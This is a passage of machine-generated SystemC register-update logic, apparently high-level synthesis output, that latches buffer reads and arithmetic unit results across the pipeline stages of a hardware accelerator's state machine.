bufi_Dout_A.read(); bufw_load_4_reg_3334 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_7_reg_3404 = bufi_Dout_A.read(); bufw_load_5_reg_3399 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_8_reg_3439 = bufi_Dout_A.read(); bufw_load_6_reg_3434 = bufw_Dout_A.read(); tmp_8_reg_3429 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_9_reg_3469 = bufi_Dout_A.read(); bufw_load_7_reg_3464 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0))) { bufi_load_reg_2924 = bufi_Dout_A.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00011001.read(), ap_const_boolean_0))) { bufo_addr_reg_2650 = (sc_lv<12>) (tmp_174_cast_fu_1241_p1.read()); i_cast6_mid2_reg_2567 = i_cast6_mid2_fu_1148_p1.read(); j_cast4_mid2_cast_reg_2585 = j_cast4_mid2_cast_fu_1151_p1.read(); tmp_116_reg_2644 = tmp_116_fu_1224_p2.read(); tmp_13_reg_2604 = tmp_13_fu_1176_p2.read(); tmp_56_reg_2624 = tmp_56_fu_1185_p2.read(); tmp_67_reg_2629 = grp_fu_1043_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0))) { bufo_load_reg_2809 = bufo_Dout_A.read(); bufw_load_reg_2804 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufw_load_14_reg_3629 = bufw_Dout_A.read(); tmp_8_6_reg_3624 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufw_load_15_reg_3644 = bufw_Dout_A.read(); tmp_8_8_reg_3639 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0))) { col_b_1_reg_2408 = col_b_1_fu_819_p2.read(); row_b_1_reg_2402 = row_b_1_fu_814_p2.read(); tmp_48_reg_2414 = tmp_48_fu_824_p3.read(); tmp_51_reg_2432 = tmp_51_fu_852_p1.read(); tmp_53_reg_2437 = tmp_50_fu_846_p2.read().range(11, 3); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0))) { col_b_cast2_mid2_reg_2489 = col_b_cast2_mid2_fu_996_p3.read(); row_b_cast3_mid2_reg_2473 = row_b_cast3_mid2_fu_969_p3.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011001.read(), ap_const_boolean_0))) { col_b_mid1_reg_2363 = col_b_mid1_fu_767_p3.read(); i_1_reg_2345 = i_1_fu_749_p2.read(); j_1_reg_2351 = j_1_fu_755_p2.read(); row_b_mid_reg_2357 = row_b_mid_fu_760_p3.read(); to_b_mid2_reg_2369 = to_b_mid2_fu_783_p3.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0))) { exitcond_flatten1_reg_2269 = exitcond_flatten1_fu_656_p2.read(); not_exitcond_flatten_1_reg_2274 = not_exitcond_flatten_1_fu_667_p2.read(); not_exitcond_flatten_reg_2262 = not_exitcond_flatten_fu_651_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, exitcond_flatten3_fu_621_p2.read()))) { exitcond_flatten2_reg_2251 = exitcond_flatten2_fu_639_p2.read(); exitcond_flatten_reg_2238 = exitcond_flatten_fu_633_p2.read(); indvar_flatten81_op_reg_2257 = indvar_flatten81_op_fu_645_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0))) { exitcond_flatten43_m_reg_2290 = exitcond_flatten43_m_fu_688_p2.read(); exitcond_flatten_mid_2_reg_2299 = exitcond_flatten_mid_2_fu_692_p2.read(); tmp_2_reg_2285 = tmp_2_fu_678_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0))) { i_cast7_mid2_reg_2386 = i_cast7_mid2_fu_803_p3.read(); j_cast5_mid2_reg_2395 = j_cast5_mid2_fu_809_p3.read(); to_b_1_reg_2463 = to_b_1_fu_926_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011001.read(), ap_const_boolean_0))) { indvar_flatten41_op_reg_2340 = indvar_flatten41_op_fu_743_p2.read(); indvar_flatten_op_reg_2335 = indvar_flatten_op_fu_737_p2.read(); j_mid_reg_2309 = j_mid_fu_697_p3.read(); tmp_2_mid2_reg_2328 = tmp_2_mid2_fu_731_p2.read(); tmp_3_reg_2315 = tmp_3_fu_708_p2.read(); tmp_7_reg_2322 = tmp_7_fu_721_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011001.read(), ap_const_boolean_0))) { indvar_flatten_next1_reg_2381 = indvar_flatten_next1_fu_797_p3.read(); indvar_flatten_next_reg_2376 = indvar_flatten_next_fu_791_p3.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0))) { indvar_flatten_next2_reg_2280 = indvar_flatten_next2_fu_672_p3.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()))) { indvar_flatten_next3_reg_2233 = indvar_flatten_next3_fu_627_p2.read(); } if (((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_reg_pp0_iter7_exitcond_flatten3_reg_2229.read(), ap_const_lv1_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter15_exitcond_flatten3_reg_2229.read())))) { reg_575 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011001.read(), ap_const_boolean_0))) { tmp_101_reg_3094 = tmp_101_fu_1811_p1.read(); tmp_102_reg_3099 = tmp_102_fu_1815_p1.read(); tmp_20_reg_3064 = tmp_20_fu_1778_p2.read(); tmp_38_reg_3074 = tmp_38_fu_1787_p2.read(); tmp_88_reg_3084 = tmp_88_fu_1795_p2.read(); tmp_95_reg_3089 = tmp_95_fu_1806_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0))) { tmp_103_reg_3139 = tmp_103_fu_1875_p2.read(); tmp_109_reg_3144 = tmp_109_fu_1880_p1.read(); tmp_115_reg_3149 = tmp_115_fu_1884_p1.read(); tmp_21_reg_3114 = tmp_21_fu_1847_p2.read(); tmp_39_reg_3124 = tmp_39_fu_1856_p2.read(); tmp_96_reg_3134 = tmp_96_fu_1864_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { tmp_104_reg_3184 = tmp_104_fu_1905_p2.read(); tmp_110_reg_3189 = tmp_110_fu_1916_p2.read(); tmp_126_reg_3194 = tmp_126_fu_1921_p1.read(); tmp_133_reg_3199 = tmp_133_fu_1925_p1.read(); tmp_140_reg_3204 = tmp_140_fu_1929_p1.read(); tmp_147_reg_3209 = tmp_147_fu_1933_p1.read(); tmp_154_reg_3214 = tmp_154_fu_1937_p1.read(); tmp_161_reg_3219 = tmp_161_fu_1941_p1.read(); tmp_168_reg_3224 = tmp_168_fu_1945_p1.read(); tmp_172_reg_3229 = tmp_172_fu_1949_p1.read(); tmp_173_reg_3234 = tmp_173_fu_1953_p1.read(); tmp_175_reg_3239 = tmp_175_fu_1957_p1.read(); tmp_176_reg_3244 = tmp_176_fu_1961_p1.read(); tmp_177_reg_3249 = tmp_177_fu_1965_p1.read(); tmp_178_reg_3254 = tmp_178_fu_1969_p1.read(); tmp_179_reg_3259 = tmp_179_fu_1973_p1.read(); tmp_22_reg_3164 = tmp_22_fu_1888_p2.read(); tmp_40_reg_3174 = tmp_40_fu_1897_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011001.read(), ap_const_boolean_0))) { tmp_107_reg_2969 = grp_fu_1434_p2.read(); tmp_18_reg_2929 = tmp_18_fu_1688_p2.read(); tmp_36_reg_2939 = tmp_36_fu_1697_p2.read(); tmp_72_reg_2949 = tmp_72_fu_1705_p2.read(); tmp_79_reg_2954 = tmp_79_fu_1716_p2.read(); tmp_85_reg_2959 = tmp_85_fu_1721_p1.read(); tmp_86_reg_2964 = tmp_86_fu_1725_p1.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter11.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter11_exitcond_flatten3_reg_2229.read()))) { tmp_10_10_reg_3734 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter12.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter12_exitcond_flatten3_reg_2229.read()))) { tmp_10_11_reg_3739 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter13.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter13_exitcond_flatten3_reg_2229.read()))) { tmp_10_12_reg_3744 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter14.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter14_exitcond_flatten3_reg_2229.read()))) { tmp_10_13_reg_3749 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter2_exitcond_flatten3_reg_2229.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter3.read()))) { tmp_10_1_reg_3689 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter3.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter3_exitcond_flatten3_reg_2229.read()))) { tmp_10_2_reg_3694 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter4.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter4_exitcond_flatten3_reg_2229.read()))) { tmp_10_3_reg_3699 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter5.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter5_exitcond_flatten3_reg_2229.read()))) { tmp_10_4_reg_3704 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter6.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter6_exitcond_flatten3_reg_2229.read()))) { tmp_10_5_reg_3709 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter8.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter8_exitcond_flatten3_reg_2229.read()))) { tmp_10_7_reg_3714 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter9.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter9_exitcond_flatten3_reg_2229.read()))) { tmp_10_8_reg_3719 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter10.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter10_exitcond_flatten3_reg_2229.read()))) { tmp_10_9_reg_3724 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter2.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter2_exitcond_flatten3_reg_2229.read()))) { tmp_10_reg_3664 = grp_fu_567_p2.read(); tmp_8_11_reg_3669 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter10.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter10_exitcond_flatten3_reg_2229.read()))) { tmp_10_s_reg_3729 = grp_fu_567_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { tmp_111_reg_3294 = tmp_111_fu_1994_p2.read(); tmp_127_reg_3299 = tmp_127_fu_2005_p2.read(); tmp_134_reg_3304 = tmp_134_fu_2017_p2.read(); tmp_141_reg_3309 = tmp_141_fu_2029_p2.read(); tmp_148_reg_3314 = tmp_148_fu_2041_p2.read(); tmp_155_reg_3319 = tmp_155_fu_2053_p2.read(); tmp_162_reg_3324 = tmp_162_fu_2065_p2.read(); tmp_169_reg_3329 = tmp_169_fu_2077_p2.read(); tmp_23_reg_3274 = tmp_23_fu_1977_p2.read(); tmp_41_reg_3284 = tmp_41_fu_1986_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00011001.read(), ap_const_boolean_0))) { tmp_117_reg_2547 = tmp_117_fu_1118_p1.read(); tmp_118_reg_2552 = grp_fu_920_p2.read().range(13, 3); tmp_119_reg_2557 = grp_fu_920_p2.read().range(11, 3); tmp_171_reg_2562 = tmp_171_fu_1142_p2.read(); tmp_55_reg_2527 = tmp_55_fu_1083_p2.read(); tmp_59_reg_2532 = grp_fu_890_p2.read(); tmp_6_cast_mid2_reg_2516 = tmp_6_cast_mid2_fu_1052_p3.read(); tmp_cast_mid2_reg_2522 = tmp_cast_mid2_fu_1057_p3.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0))) { tmp_120_reg_2704 = tmp_120_fu_1310_p2.read(); tmp_14_reg_2655 = tmp_14_fu_1246_p2.read(); tmp_32_reg_2679 = tmp_32_fu_1254_p2.read(); tmp_75_reg_2689 = grp_fu_1112_p2.read(); tmp_cast_mid2_cast_reg_2660 = tmp_cast_mid2_cast_fu_1251_p1.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0))) { tmp_121_reg_2749 = tmp_121_fu_1370_p2.read(); tmp_15_reg_2709 = tmp_15_fu_1316_p2.read(); tmp_33_reg_2719 = tmp_33_fu_1325_p2.read(); tmp_61_reg_2724 = tmp_61_fu_1329_p1.read(); tmp_62_reg_2729 = tmp_62_fu_1333_p1.read(); tmp_83_reg_2734 = grp_fu_1218_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0))) { tmp_124_reg_3024 = grp_fu_1508_p2.read(); tmp_131_reg_3029 = grp_fu_1537_p2.read(); tmp_138_reg_3034 = grp_fu_1566_p2.read(); tmp_145_reg_3039 = grp_fu_1595_p2.read(); tmp_152_reg_3044 = grp_fu_1624_p2.read(); tmp_159_reg_3049 = grp_fu_1653_p2.read(); tmp_166_reg_3054 = grp_fu_1682_p2.read(); tmp_19_reg_2984 = tmp_19_fu_1733_p2.read(); tmp_37_reg_2994 = tmp_37_fu_1742_p2.read(); tmp_80_reg_3004 = tmp_80_fu_1750_p2.read(); tmp_87_reg_3009 = tmp_87_fu_1761_p2.read(); tmp_93_reg_3014 = tmp_93_fu_1766_p1.read(); tmp_94_reg_3019 = tmp_94_fu_1770_p1.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { tmp_128_reg_3364 = tmp_128_fu_2099_p2.read(); tmp_135_reg_3369 = tmp_135_fu_2103_p2.read(); tmp_142_reg_3374 = tmp_142_fu_2107_p2.read(); tmp_149_reg_3379 = tmp_149_fu_2111_p2.read(); tmp_156_reg_3384 = tmp_156_fu_2115_p2.read(); tmp_163_reg_3389 = tmp_163_fu_2119_p2.read(); tmp_170_reg_3394 = tmp_170_fu_2123_p2.read(); tmp_24_reg_3344 = tmp_24_fu_2082_p2.read(); tmp_42_reg_3354 = tmp_42_fu_2091_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0))) { tmp_16_reg_2754 = tmp_16_fu_1374_p2.read(); tmp_34_reg_2764 = tmp_34_fu_1383_p2.read(); tmp_63_reg_2769 = tmp_63_fu_1394_p2.read(); tmp_69_reg_2774 = tmp_69_fu_1399_p1.read(); tmp_70_reg_2779 = tmp_70_fu_1403_p1.read(); tmp_91_reg_2784 = grp_fu_1290_p2.read(); } if ((esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0))) { tmp_17_reg_2814 = tmp_17_fu_1444_p2.read(); tmp_35_reg_2824 = tmp_35_fu_1453_p2.read(); tmp_64_reg_2829 = tmp_64_fu_1457_p2.read(); tmp_71_reg_2834 = tmp_71_fu_1468_p2.read(); tmp_77_reg_2839 = tmp_77_fu_1473_p1.read(); tmp_78_reg_2844 = tmp_78_fu_1477_p1.read(); tmp_99_reg_2849 = grp_fu_1364_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { tmp_25_reg_3409 = tmp_25_fu_2127_p2.read(); tmp_43_reg_3419 = tmp_43_fu_2136_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { tmp_26_reg_3444 = tmp_26_fu_2144_p2.read(); tmp_44_reg_3454 = tmp_44_fu_2153_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { tmp_27_reg_3474 = tmp_27_fu_2161_p2.read(); tmp_28_reg_3479 = tmp_28_fu_2166_p2.read(); tmp_45_reg_3489 = tmp_45_fu_2175_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { tmp_46_reg_3514 = tmp_46_fu_2187_p2.read(); tmp_47_reg_3519 = tmp_47_fu_2191_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0))) { tmp_52_reg_2500 = tmp_52_fu_1016_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && 